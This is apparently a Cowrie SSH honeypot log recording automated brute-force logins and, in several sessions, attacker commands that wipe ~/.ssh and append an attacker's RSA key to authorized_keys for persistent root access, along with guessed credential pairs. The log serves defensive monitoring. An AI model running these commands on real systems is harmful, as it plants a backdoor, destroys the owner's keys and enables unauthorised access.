{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:14:57.467095Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.login.success","username":"root","password":"%TGB4rfv","message":"login attempt [root/%TGB4rfv] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:14:58.223891Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:14:58.597543Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:14:58.598239Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:14:58.599259Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:14:58.778933Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:14:59.595389Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:14:59.596087Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:14:59.776246Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:14:59.777274Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36616,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef5f30217146","protocol":"ssh","message":"New connection: 212.227.235.229:36616 (1.2.3.4:22) [session: ef5f30217146]","sensor":"my-vps","timestamp":"2025-08-28T15:14:59.956554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:14:59.957157Z","src_ip":"212.227.235.229","session":"ef5f30217146"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:15:00.138816Z","src_ip":"212.227.235.229","session":"ef5f30217146"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":63139,"dst_ip":"1.2.3.4","dst_port":22,"session":"e88fab1abb28","protocol":"ssh","message":"New connection: 80.94.95.15:63139 (1.2.3.4:22) [session: e88fab1abb28]","sensor":"my-vps","timestamp":"2025-08-28T15:15:00.310264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:15:00.311253Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:15:00.377154Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole","message":"login attempt [nichole/nichole] failed","sensor":"my-vps","timestamp":"2025-08-28T15:15:00.735816Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:15:00.905079Z","src_ip":"212.227.235.229","session":"ef5f30217146"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole1","message":"login attempt [nichole/nichole1] failed","sensor":"my-vps","timestamp":"2025-08-28T15:15:01.805780Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:15:02.089103Z","src_ip":"212.227.235.229","session":"ef5f30217146"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37624,"dst_ip":"1.2.3.4","dst_port":22,"session":"23a32f8f7762","protocol":"ssh","message":"New connection: 212.227.235.229:37624 (1.2.3.4:22) [session: 23a32f8f7762]","sensor":"my-vps","timestamp":"2025-08-28T15:15:02.270565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:15:02.271849Z","src_ip":"212.227.235.229","session":"23a32f8f7762"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:15:02.452747Z","src_ip":"212.227.235.229","session":"23a32f8f7762"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole123","message":"login attempt [nichole/nichole123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:15:02.874311Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:15:03.221189Z","src_ip":"212.227.235.229","session":"23a32f8f7762"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:15:03.402465Z","src_ip":"212.227.235.229","session":"d6f64d2421e8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:15:03.403746Z","src_ip":"212.227.235.229","session":"23a32f8f7762"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole1234","message":"login attempt [nichole/nichole1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:15:03.943555Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole12345","message":"login attempt [nichole/nichole12345] failed","sensor":"my-vps","timestamp":"2025-08-28T15:15:05.038640Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:15:06.136095Z","src_ip":"80.94.95.15","session":"e88fab1abb28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34176,"dst_ip":"1.2.3.4","dst_port":22,"session":"da73cc61ff49","protocol":"ssh","message":"New connection: 212.227.235.229:34176 (1.2.3.4:22) [session: da73cc61ff49]","sensor":"my-vps","timestamp":"2025-08-28T15:16:04.996141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:16:04.997107Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:16:05.183309Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.login.success","username":"root","password":"pulamea123","message":"login attempt [root/pulamea123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:16:05.963053Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:16:06.353949Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:16:06.354959Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:16:06.356562Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:16:06.541898Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:16:06.972504Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:16:06.973395Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:16:07.159595Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:16:07.160816Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34772,"dst_ip":"1.2.3.4","dst_port":22,"session":"26a130269147","protocol":"ssh","message":"New connection: 212.227.235.229:34772 (1.2.3.4:22) [session: 26a130269147]","sensor":"my-vps","timestamp":"2025-08-28T15:16:07.340526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:16:07.341711Z","src_ip":"212.227.235.229","session":"26a130269147"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:16:07.526037Z","src_ip":"212.227.235.229","session":"26a130269147"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:16:08.303749Z","src_ip":"212.227.235.229","session":"26a130269147"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:16:09.490920Z","src_ip":"212.227.235.229","session":"26a130269147"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35832,"dst_ip":"1.2.3.4","dst_port":22,"session":"282f03d257af","protocol":"ssh","message":"New connection: 212.227.235.229:35832 (1.2.3.4:22) [session: 282f03d257af]","sensor":"my-vps","timestamp":"2025-08-28T15:16:09.678418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:16:09.679368Z","src_ip":"212.227.235.229","session":"282f03d257af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:16:09.864292Z","src_ip":"212.227.235.229","session":"282f03d257af"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:16:10.645839Z","src_ip":"212.227.235.229","session":"282f03d257af"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:16:10.832056Z","src_ip":"212.227.235.229","session":"282f03d257af"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:16:10.833157Z","src_ip":"212.227.235.229","session":"da73cc61ff49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60772,"dst_ip":"1.2.3.4","dst_port":22,"session":"26ed4a91c31c","protocol":"ssh","message":"New connection: 212.227.235.229:60772 (1.2.3.4:22) [session: 26ed4a91c31c]","sensor":"my-vps","timestamp":"2025-08-28T15:17:12.139707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:17:12.140653Z","src_ip":"212.227.235.229","session":"26ed4a91c31c"}
